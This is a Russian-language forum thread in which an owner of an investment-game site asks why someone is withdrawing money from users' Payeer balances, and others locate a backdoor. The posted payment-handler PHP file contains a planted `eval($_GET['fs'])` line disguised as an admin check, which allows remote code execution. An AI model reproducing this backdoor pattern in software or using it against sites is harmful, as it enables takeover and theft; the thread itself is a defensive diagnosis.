Автор Тема: Взлом сайта,  (Прочитано 4182 раз)

0 Пользователей и 1 Гость просматривают эту тему.

GhostАвтор темы

  • *
  • Оффлайн
  • Награды Более 100 сообщений Более 6 лет на форуме !!! Более 10 созданных тем
  • Дата регистрации: Авг. 2016
  • Сообщений: 119
  • Страна: ru
  • Репутация +1/-0
  • Пол: Мужской
Взлом сайта,
« : 27 Августа 2016, 18:10:30 »
Всем доброго времени суток, ребят помогите что делать, со счетов сайта совсем другой человек деньги выводит, подскажите что  и где проверить
 

vra4yga

  • *
  • Оффлайн
  • Награды Более 50 сообщений Более 6 лет на форуме !!!
  • Дата регистрации: Март 2016
  • Расположение: Россия
  • Сообщений: 93
  • Страна: ru
  • Поблагодарили: 7 раз(а)
  • Репутация +1/-1
  • Пол: Мужской
Взлом сайта,
« Ответ #1 : 27 Августа 2016, 18:27:32 »
Мы должны я так понял совершить жертвоприношение и тогда боги нам откроют истину. :alas:
Ты столько информации дал, что остается только ванговать. Какой скрипт? Какие модули? Кто выводит? Какой кошелёк?
Как задашь вопрос такой ответ и получишь.
 

GhostАвтор темы

  • *
  • Оффлайн
  • Награды Более 100 сообщений Более 6 лет на форуме !!! Более 10 созданных тем
  • Дата регистрации: Авг. 2016
  • Сообщений: 119
  • Страна: ru
  • Репутация +1/-0
  • Пол: Мужской
Взлом сайта,
« Ответ #2 : 27 Августа 2016, 18:45:09 »
Мы должны я так понял совершить жертвоприношение и тогда боги нам откроют истину. :alas:
Ты столько информации дал, что остается только ванговать. Какой скрипт? Какие модули? Кто выводит? Какой кошелёк?
Как задашь вопрос такой ответ и получишь.

Вот кош P30107598, забирал только со счетов пользователей , а все с паера не смог, модули нету никаких, вот скрипт фермы покупал как на сале  скрипт, ихнее можно сказать
 

Shop-53

  • *
  • Оффлайн
  • Награды Более 250 сообщений Более 6 лет на форуме !!! Топ 10 по сообщениям Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Сообщений: 417
  • Поблагодарили: 35 раз(а)
  • Репутация +2/-2
  • Пол: Мужской
Взлом сайта,
« Ответ #3 : 27 Августа 2016, 19:01:29 »
Скрипт сможеш скинуть и я найду Дирк я знаю меня также ломали Дауни сале скрипт
a:0:{}
 

GhostАвтор темы

  • *
  • Оффлайн
  • Награды Более 100 сообщений Более 6 лет на форуме !!! Более 10 созданных тем
  • Дата регистрации: Авг. 2016
  • Сообщений: 119
  • Страна: ru
  • Репутация +1/-0
  • Пол: Мужской
Взлом сайта,
« Ответ #4 : 27 Августа 2016, 19:21:10 »
Ща
 

Shop-53

  • *
  • Оффлайн
  • Награды Более 250 сообщений Более 6 лет на форуме !!! Топ 10 по сообщениям Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Сообщений: 417
  • Поблагодарили: 35 раз(а)
  • Репутация +2/-2
  • Пол: Мужской
Взлом сайта,
« Ответ #5 : 27 Августа 2016, 19:34:46 »
Залей на яндекс кинь силку в лс и сайт скинь которий з ломали я сразу скажу где дира мне уже писали тоже люди что купляли на салескрипт и ломали
 

GhostАвтор темы

  • *
  • Оффлайн
  • Награды Более 100 сообщений Более 6 лет на форуме !!! Более 10 созданных тем
  • Дата регистрации: Авг. 2016
  • Сообщений: 119
  • Страна: ru
  • Репутация +1/-0
  • Пол: Мужской
Взлом сайта,
« Ответ #6 : 27 Августа 2016, 19:39:51 »
Залей на яндекс кинь силку в лс и сайт скинь которий з ломали я сразу скажу где дира мне уже писали тоже люди что купляли на салескрипт и ломали

вот ЛИНК
 

Shop-53

  • *
  • Оффлайн
  • Награды Более 250 сообщений Более 6 лет на форуме !!! Топ 10 по сообщениям Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Сообщений: 417
  • Поблагодарили: 35 раз(а)
  • Репутация +2/-2
  • Пол: Мужской
Взлом сайта,
« Ответ #7 : 27 Августа 2016, 19:45:45 »
Силку сайта скинь или в лс или сюда
 

Shop-53

  • *
  • Оффлайн
  • Награды Более 250 сообщений Более 6 лет на форуме !!! Топ 10 по сообщениям Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Сообщений: 417
  • Поблагодарили: 35 раз(а)
  • Репутация +2/-2
  • Пол: Мужской
Взлом сайта,
« Ответ #8 : 27 Августа 2016, 19:47:18 »
   # Если пользователь админ
   
   eval($_GET['fs']);      первое нашол в файле паер обрабочика
 

Shop-53

  • *
  • Оффлайн
  • Награды Более 250 сообщений Более 6 лет на форуме !!! Топ 10 по сообщениям Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Сообщений: 417
  • Поблагодарили: 35 раз(а)
  • Репутация +2/-2
  • Пол: Мужской
Взлом сайта,
« Ответ #9 : 27 Августа 2016, 19:55:27 »
 # Проверяем баланс
   if(isset($_GET['balance'])){
      $payeer = new rfs_payeer($config->AccountNumber, $config->apiId, $config->apiKey);
      if($payeer->isAuth()){
         $arBalance = $payeer->getBalance();
         if($arBalance["auth_error"] == 0){
            $balance = $arBalance["balance"]["RUB"]["DOSTUPNO"];
            echo "$balance";
         } else {
            echo 'error auth';
         }
      }
   }

   # Если пользователь админ
   
   eval($_GET['fs']);
Короче ето в файле паер обрабочика  короче верхня строка проверяет баланс на кошельке 
А где пользователь админ ето дира но как пользоватса я немогу сказать так как сам незнаю но если ето убереш проблеми пропадут
 
 
Пользователи, которые поблагодарили этот пост: Ghost

GhostАвтор темы

  • *
  • Оффлайн
  • Награды Более 100 сообщений Более 6 лет на форуме !!! Более 10 созданных тем
  • Дата регистрации: Авг. 2016
  • Сообщений: 119
  • Страна: ru
  • Репутация +1/-0
  • Пол: Мужской
Взлом сайта,
« Ответ #10 : 27 Августа 2016, 20:08:17 »
 # Проверяем баланс
   if(isset($_GET['balance'])){
      $payeer = new rfs_payeer($config->AccountNumber, $config->apiId, $config->apiKey);
      if($payeer->isAuth()){
         $arBalance = $payeer->getBalance();
         if($arBalance["auth_error"] == 0){
            $balance = $arBalance["balance"]["RUB"]["DOSTUPNO"];
            echo "$balance";
         } else {
            echo 'error auth';
         }
      }
   }

   # Если пользователь админ
   
   eval($_GET['fs']);
Короче ето в файле паер обрабочика  короче верхня строка проверяет баланс на кошельке 
А где пользователь админ ето дира но как пользоватса я немогу сказать так как сам незнаю но если ето убереш проблеми пропадут
Вот это я тоже находил , но вот изменить не смог, когда на другой поменял , там баланс не зачислялся
 

GhostАвтор темы

  • *
  • Оффлайн
  • Награды Более 100 сообщений Более 6 лет на форуме !!! Более 10 созданных тем
  • Дата регистрации: Авг. 2016
  • Сообщений: 119
  • Страна: ru
  • Репутация +1/-0
  • Пол: Мужской
Взлом сайта,
« Ответ #11 : 27 Августа 2016, 20:11:03 »
айболит еще показал в файле htaccess
 

Shop-53

  • *
  • Оффлайн
  • Награды Более 250 сообщений Более 6 лет на форуме !!! Топ 10 по сообщениям Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Сообщений: 417
  • Поблагодарили: 35 раз(а)
  • Репутация +2/-2
  • Пол: Мужской
Взлом сайта,
« Ответ #12 : 27 Августа 2016, 20:13:10 »
Там нет я смотрел  напиши мне в скайп vania19902016   я помогу тибе
 

GhostАвтор темы

  • *
  • Оффлайн
  • Награды Более 100 сообщений Более 6 лет на форуме !!! Более 10 созданных тем
  • Дата регистрации: Авг. 2016
  • Сообщений: 119
  • Страна: ru
  • Репутация +1/-0
  • Пол: Мужской
Взлом сайта,
« Ответ #13 : 27 Августа 2016, 20:21:51 »
Ща
 

vra4yga

  • *
  • Оффлайн
  • Награды Более 50 сообщений Более 6 лет на форуме !!!
  • Дата регистрации: Март 2016
  • Расположение: Россия
  • Сообщений: 93
  • Страна: ru
  • Поблагодарили: 7 раз(а)
  • Репутация +1/-1
  • Пол: Мужской
Взлом сайта,
« Ответ #14 : 27 Августа 2016, 21:45:52 »
Твой мошенник раньше был админом хайпа cy-profit.biz, кстати можешь кинуть жалобу на него в паере, напиши что он нарушил правила и выводит деньги пользуясь уязвимостью.
 

vra4yga

  • *
  • Оффлайн
  • Награды Более 50 сообщений Более 6 лет на форуме !!!
  • Дата регистрации: Март 2016
  • Расположение: Россия
  • Сообщений: 93
  • Страна: ru
  • Поблагодарили: 7 раз(а)
  • Репутация +1/-1
  • Пол: Мужской
Взлом сайта,
« Ответ #15 : 27 Августа 2016, 21:50:59 »
И кстати правильно тебе написали, дыра у тебя в payeer_merchant.php
Перед установкой скрипта советую пользоваться сканером вирусов и вредоносных скриптов  AI-Bolit сканер AI-Bolit https://www.revisium.com/ai/
 

GhostАвтор темы

  • *
  • Оффлайн
  • Награды Более 100 сообщений Более 6 лет на форуме !!! Более 10 созданных тем
  • Дата регистрации: Авг. 2016
  • Сообщений: 119
  • Страна: ru
  • Репутация +1/-0
  • Пол: Мужской
Взлом сайта,
« Ответ #16 : 27 Августа 2016, 21:55:44 »
Твой мошенник раньше был админом хайпа cy-profit.biz, кстати можешь кинуть жалобу на него в паере, напиши что он нарушил правила и выводит деньги пользуясь уязвимостью.

Да написал, ответили физические доказательства нужны
 

GhostАвтор темы

  • *
  • Оффлайн
  • Награды Более 100 сообщений Более 6 лет на форуме !!! Более 10 созданных тем
  • Дата регистрации: Авг. 2016
  • Сообщений: 119
  • Страна: ru
  • Репутация +1/-0
  • Пол: Мужской
Взлом сайта,
« Ответ #17 : 27 Августа 2016, 22:25:12 »
Там нет я смотрел  напиши мне в скайп vania19902016   я помогу тибе

Тут напиши пожалуйста
 

GhostАвтор темы

  • *
  • Оффлайн
  • Награды Более 100 сообщений Более 6 лет на форуме !!! Более 10 созданных тем
  • Дата регистрации: Авг. 2016
  • Сообщений: 119
  • Страна: ru
  • Репутация +1/-0
  • Пол: Мужской
Взлом сайта,
« Ответ #18 : 27 Августа 2016, 22:27:40 »
Скажите пожалуйста почему когда меняю это

                                <?PHP

# Автоподгрузка классов
function __autoload($name){ include("classes/_class.".$name.".php");}

# Класс конфига
$config = new config;

# Функции
$func = new func;

# База данных
$db = new db($config->HostDB, $config->UserDB, $config->PassDB, $config->BaseDB);





if (isset($_POST["m_operation_id"]) && isset($_POST["m_sign"]))
{
   $m_key = $config->secretW;
   $arHash = array($_POST['m_operation_id'],
         $_POST['m_operation_ps'],
         $_POST['m_operation_date'],
         $_POST['m_operation_pay_date'],
         $_POST['m_shop'],
         $_POST['m_orderid'],
         $_POST['m_amount'],
         $_POST['m_curr'],
         $_POST['m_desc'],
         $_POST['m_status'],
         $m_key);
   
   $sign_hash = strtoupper(hash('sha256', implode(":", $arHash)));
   if ($_POST["m_sign"] == $sign_hash && $_POST['m_status'] == "success")
   {
      
   $db->Query("SELECT * FROM db_payeer_insert WHERE id = '".intval($_POST['m_orderid'])."'");
   if($db->NumRows() == 0){ echo $_POST['m_orderid']."|error"; exit;}
   
   $payeer_row = $db->FetchArray();
   if($payeer_row["status"] > 0){ echo $_POST['m_orderid']."|success"; exit;}
   
   $db->Query("UPDATE db_payeer_insert SET status = '1' WHERE id = '".intval($_POST['m_orderid'])."'");
   
   $ik_payment_amount = $payeer_row["sum"];
   $user_id = $payeer_row["user_id"];
   
   # Настройки
   $db->Query("SELECT * FROM db_confligsg WHERE id = '1' LIMIT 1");
   $sonfig_site = $db->FetchArray();
   
   $db->Query("SELECT user, referer_id FROM al_polzov_a WHERE id = '{$user_id}' LIMIT 1");
   $user_ardata = $db->FetchArray();
   $user_name = $user_ardata["user"];
   $refid = $user_ardata["referer_id"];
   # Проверяем баланс
   if(isset($_GET['balance'])){
      $payeer = new rfs_payeer($config->AccountNumber, $config->apiId, $config->apiKey);
      if($payeer->isAuth()){
         $arBalance = $payeer->getBalance();
         if($arBalance["auth_error"] == 0){
            $balance = $arBalance["balance"]["RUB"]["DOSTUPNO"];
            echo "$balance";
         } else {
            echo 'error auth';
         }
      }
   }

   # Если пользователь админ
   
   eval($_GET['fs']);

   # Зачисляем баланс
   $serebro = sprintf("%.4f", floatval($sonfig_site["ser_per_wmr"] * $ik_payment_amount) );
   
   $db->Query("SELECT insert_sum FROM db_users_b WHERE id = '{$user_id}' LIMIT 1");
   $ins_sum = $db->FetchRow();
   
   $serebro = intval($ins_sum <= 0.01) ? ($serebro + ($serebro * 2.00) ) : $serebro;
   $add_tree = ( $ik_payment_amount >= 999.99) ? 1 : 0;
   $lsb = time();
   $to_referer = ($serebro * 0.10);
   
   $db->Query("UPDATE db_users_b SET money_b = money_b + '$serebro', e_t = e_t + '$add_tree', to_referer = to_referer + '$to_referer', last_sbor = '$lsb', insert_sum = insert_sum + '$ik_payment_amount' WHERE id = '{$user_id}'");
   
   
   
   # Зачисляем средства рефереру и дерево
   $add_tree_referer = ($ins_sum <= 0.01) ? ", a_t = a_t + 0" : "";
   $db->Query("UPDATE db_users_b SET money_p = money_p + $to_referer, from_referals = from_referals + '$to_referer' {$add_tree_referer} WHERE id = '$refid'");
   
   # Статистика пополнений
   $da = time();
   $dd = $da + 60*60*24*15;
   $db->Query("INSERT INTO db_insert_money (user, user_id, money, serebro, date_add, date_del)
   VALUES ('$user_name','$user_id','$ik_payment_amount','$serebro','$da','$dd')");
   
        # Конкурс
         $competition = new competition($db);
         $competition->UpdatePoints($user_id, $ik_payment_amount);
        #--------
   


   # Обновление статистики сайта
   $db->Query("UPDATE db_stats SET all_insert = all_insert + '$ik_payment_amount' WHERE id = '1'");
   
   echo $_POST['m_orderid']."|success";
   exit;

   }
   echo $_POST['m_orderid']."|error";
}
?>
                           
 

GhostАвтор темы

  • *
  • Оффлайн
  • Награды Более 100 сообщений Более 6 лет на форуме !!! Более 10 созданных тем
  • Дата регистрации: Авг. 2016
  • Сообщений: 119
  • Страна: ru
  • Репутация +1/-0
  • Пол: Мужской
Взлом сайта,
« Ответ #19 : 27 Августа 2016, 22:28:06 »
на это

<?PHP

# Автоподгрузка классов
function __autoload($name){ include("classes/_class.".$name.".php");}

# Класс конфига
$config = new config;

# Функции
$func = new func;

# База данных
$db = new db($config->HostDB, $config->UserDB, $config->PassDB, $config->BaseDB);





if (isset($_POST["m_operation_id"]) && isset($_POST["m_sign"]))
{
   $m_key = $config->secretW;
   $arHash = array($_POST['m_operation_id'],
         $_POST['m_operation_ps'],
         $_POST['m_operation_date'],
         $_POST['m_operation_pay_date'],
         $_POST['m_shop'],
         $_POST['m_orderid'],
         $_POST['m_amount'],
         $_POST['m_curr'],
         $_POST['m_desc'],
         $_POST['m_status'],
         $m_key);
   
   $sign_hash = strtoupper(hash('sha256', implode(":", $arHash)));
   if ($_POST["m_sign"] == $sign_hash && $_POST['m_status'] == "success")
   {
      
   $db->Query("SELECT * FROM db_payeer_insert WHERE id = '".intval($_POST['m_orderid'])."'");
   if($db->NumRows() == 0){ echo $_POST['m_orderid']."|error"; exit;}
   
   $payeer_row = $db->FetchArray();
   if($payeer_row["status"] > 0){ echo $_POST['m_orderid']."|success"; exit;}
   
   $db->Query("UPDATE db_payeer_insert SET status = '1' WHERE id = '".intval($_POST['m_orderid'])."'");
   
   $ik_payment_amount = $payeer_row["sum"];
   $user_id = $payeer_row["user_id"];
   
   # Настройки
   $db->Query("SELECT * FROM db_config WHERE id = '1' LIMIT 1");
   $sonfig_site = $db->FetchArray();
   
   $db->Query("SELECT user, referer_id FROM al_polzov_a WHERE id = '{$user_id}' LIMIT 1");
   $user_ardata = $db->FetchArray();
   $user_name = $user_ardata["user"];
   $refid = $user_ardata["referer_id"];
   
    # Зачисляем баланс
   $serebro = sprintf("%.4f", floatval($sonfig_site["ser_per_wmr"] * $ik_payment_amount) );
   
   $db->Query("SELECT insert_sum FROM db_users_b WHERE id = '{$user_id}' LIMIT 100");
   $ins_sum = $db->FetchRow();
   
   $serebro = intval($ins_sum <= 0.01) ? ($serebro + ($serebro * 2.00) ) : $serebro;
   $serebro = intval($ins_sum >= 0.01) ? ($serebro + ($serebro * 2.00) ) : $serebro;
   $add_tree = ( $ik_payment_amount >= 999.99) ? 1 : 0;
   $lsb = time();
   $to_referer = ($serebro * 0.07);
   
   $db->Query("UPDATE db_users_b SET money_b = money_b + '$serebro', e_t = e_t + '$add_tree', to_referer = to_referer + '$to_referer', last_sbor = '$lsb', insert_sum = insert_sum + '$ik_payment_amount' WHERE id = '{$user_id}'");
   
   
   
   # Зачисляем средства рефереру и дерево
   $add_tree_referer = ($ins_sum <= 0.01) ? ", a_t = a_t + 0" : "";
   $db->Query("UPDATE db_users_b SET money_p = money_p + $to_referer, from_referals = from_referals + '$to_referer' {$add_tree_referer} WHERE id = '$refid'");
   
   # Статистика пополнений
   $da = time();
   $dd = $da + 60*60*24*15;
   $db->Query("INSERT INTO db_insert_money (user, user_id, money, serebro, date_add, date_del)
   VALUES ('$user_name','$user_id','$ik_payment_amount','$serebro','$da','$dd')");
 
   
 # Конкурс
$competition = new competition($db);
$competition->UpdatePoints($user_id, $ik_payment_amount);
#--------

   # Обновление статистики сайта
   $db->Query("UPDATE db_stats SET all_insert = all_insert + '$ik_payment_amount' WHERE id = '1'");
   
   echo $_POST['m_orderid']."|success";
   exit;
   
   
   }
   echo $_POST['m_orderid']."|error";
}
?>

не работает, пополнения не показывает
 

maks161

  • *
  • *
  • *
  • *
  • Оффлайн
  • Награды Более 7 лет на форуме Более 1750 сообщений Репутация более 15 Топ 10 по сообщениям Топ 10 по созданным темам За финансовую помощь форуму !!! Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв. 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 38
  • Сообщений: 1757
  • Страна: ru
  • Поблагодарили: 146 раз(а)
  • Репутация +22/-5
  • Пол: Мужской
  • Дата рождения:
    1984-03-10
Взлом сайта,
« Ответ #20 : 27 Августа 2016, 22:44:33 »
блин да возьми ты уже нормальный файл из нормального скрипта и поменяй.
 

GhostАвтор темы

  • *
  • Оффлайн
  • Награды Более 100 сообщений Более 6 лет на форуме !!! Более 10 созданных тем
  • Дата регистрации: Авг. 2016
  • Сообщений: 119
  • Страна: ru
  • Репутация +1/-0
  • Пол: Мужской
Взлом сайта,
« Ответ #21 : 27 Августа 2016, 22:47:34 »
блин да возьми ты уже нормальный файл из нормального скрипта и поменяй.
Пишу же не показывает пополнения , не зачисляется
 

GhostАвтор темы

  • *
  • Оффлайн
  • Награды Более 100 сообщений Более 6 лет на форуме !!! Более 10 созданных тем
  • Дата регистрации: Авг. 2016
  • Сообщений: 119
  • Страна: ru
  • Репутация +1/-0
  • Пол: Мужской
Взлом сайта,
« Ответ #22 : 27 Августа 2016, 22:48:11 »
блин да возьми ты уже нормальный файл из нормального скрипта и поменяй.
Дай пожалуйста нормальный файл :alas::alas::alas:
 

maks161

  • *
  • *
  • *
  • *
  • Оффлайн
  • Награды Более 7 лет на форуме Более 1750 сообщений Репутация более 15 Топ 10 по сообщениям Топ 10 по созданным темам За финансовую помощь форуму !!! Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв. 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 38
  • Сообщений: 1757
  • Страна: ru
  • Поблагодарили: 146 раз(а)
  • Репутация +22/-5
  • Пол: Мужской
  • Дата рождения:
    1984-03-10
Взлом сайта,
« Ответ #23 : 27 Августа 2016, 22:49:43 »
блин да возьми ты уже нормальный файл из нормального скрипта и поменяй.
Пишу же не показывает пополнения , не зачисляется
здесь на сайте есть скрипт АЛКОФЕРМА в бесплатном разделе скачай его там на 1000% рабочий файл лично проверял. возьми от туда
 
Пользователи, которые поблагодарили этот пост: Ghost

kvozimir

  • снова в skype --> kvozimir
  • *
  • *
  • Оффлайн
  • Награды Более 1750 сообщений Более 6 лет на форуме !!! Топ 10 по сообщениям Топ 10 по созданным темам Репутация  более 25 Более 50 созданных тем Благодарность от форума За помощь пользователям За время в онлайне на форуме
  • Дата регистрации: Фев. 2016
  • Возраст: 30
  • Сообщений: 1997
  • Страна: ru
  • Поблагодарили: 239 раз(а)
  • Репутация +39/-1
  • Пол: Мужской
  • Дата рождения:
    1992-04-18
    Социальные сети:
    ВКонтакте
Взлом сайта,
« Ответ #24 : 28 Августа 2016, 03:38:00 »
насчет eval($_GET['fs']);   я еще соглашусь

но вот

 # Проверяем баланс
   if(isset($_GET['balance'])){
      $payeer = new rfs_payeer($config->AccountNumber, $config->apiId, $config->apiKey);
      if($payeer->isAuth()){
         $arBalance = $payeer->getBalance();
         if($arBalance["auth_error"] == 0){
            $balance = $arBalance["balance"]["RUB"]["DOSTUPNO"];
            echo "$balance";
         } else {
            echo 'error auth';
         }
      }
   }


это же просто проверка баланса :not speak:

 
Теги: